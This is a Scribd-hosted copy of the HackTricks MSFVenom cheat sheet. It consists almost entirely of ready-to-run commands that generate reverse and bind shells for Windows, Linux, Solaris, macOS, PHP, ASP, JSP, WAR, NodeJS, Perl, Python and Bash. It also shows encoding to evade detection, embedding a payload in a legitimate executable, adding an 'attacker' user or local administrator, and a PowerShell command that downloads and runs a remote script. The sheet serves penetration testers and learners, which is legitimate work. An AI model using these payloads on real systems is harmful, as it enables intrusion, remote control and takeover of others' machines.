0% found this document useful (0 votes)
151 views5 pages

MSFVenom - CheatSheet - HackTricks

The document provides commands for creating various types of payloads using msfvenom for different operating systems including Windows, Linux, and Mac. It includes examples for reverse shells, bind shells, and executing commands, along with parameters for encoding and embedding payloads. Additionally, it encourages joining a Discord server for further engagement and learning in hacking and bug bounty hunting.

Uploaded by

Paulin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
151 views5 pages

MSFVenom - CheatSheet - HackTricks

The document provides commands for creating various types of payloads using msfvenom for different operating systems including Windows, Linux, and Mac. It includes examples for reverse shells, bind shells, and executing commands, along with parameters for encoding and embedding payloads. Additionally, it encourages joining a Discord server for further engagement and learning in hacking and bug bounty hunting.

Uploaded by

Paulin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

One can also use the -a to specify the architecture or the --platform

Listing
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders

Common params when creating a shellcode


-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something

Windows
Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your
Port) -f exe > reverse.exe

Bind Shell
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your
Port) -f exe > bind.exe

Create User
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe >
adduser.exe

CMD Shell
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -
f exe > prompt.exe

Execute Command
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell
\"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -
f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup
administrators shaun /add" -f exe > pay.exe

Encoder
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe >
encoded.exe

Embedded inside executable


msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x
/usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe

Linux Payloads
Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your
Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf >
shell.elf

Bind Shell
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your
Port) -f elf > bind.elf
SunOS (Solaris)
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=
(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' >
solshell.elf

MAC Payloads
Reverse Shell:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -
f macho > reverse.macho

Bind Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f
macho > bind.macho

Web Based Payloads


PHP
Reverse shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw >


shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste
>> shell.php

ASP/x
Reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your
Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your
Port) -f aspx >reverse.aspx

JSP
Reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)


-f raw> reverse.jsp

WAR
Reverse Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)


-f war > reverse.war

NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)

Script Language payloads


Perl
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f
raw > reverse.pl

Python
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f
raw > reverse.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local
Port> -f raw > shell.sh

Join HackenProof Discord server to communicate with experienced hackers and bug
bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News


Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert
(ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert
(GRTE)

Support HackTricks

Previous
Reverse Shells (Linux, Windows, MSFVenom)

Next
Reverse Shells - Windows

You might also like